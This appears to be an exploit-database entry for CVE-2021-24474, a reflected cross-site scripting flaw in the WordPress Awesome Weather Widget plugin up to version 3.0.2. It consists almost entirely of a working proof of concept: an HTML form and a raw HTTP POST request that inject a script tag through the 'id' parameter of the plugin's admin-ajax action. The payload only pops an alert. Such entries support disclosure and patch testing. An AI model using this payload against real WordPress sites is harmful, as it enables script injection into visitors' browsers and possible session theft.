Exploit for Awesome Weather Widget <= 3.0.2 - Reflected Cross-site Scripting (XSS) CVE-2021-24474

Name: Exploit for Awesome Weather Widget <= 3.0.2 - Reflected Cross-site Scripting (XSS) CVE-2021-24474
Rating: 5 (89 reviews)

2021-06-28 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:49BC46A8-9D55-4FA1-8E0D-0556A6336FA0
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="awesome_weather_refresh" />
      <input type="hidden" name="owm_city_id" value="1" />
      <input type="hidden" name="id" value='aa"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 81
Connection: close
Cookie: [unauthenticated/any authenticated]

action=awesome_weather_refresh&owm_city_id=1&id=aa"><script>alert(/XSS/)</script>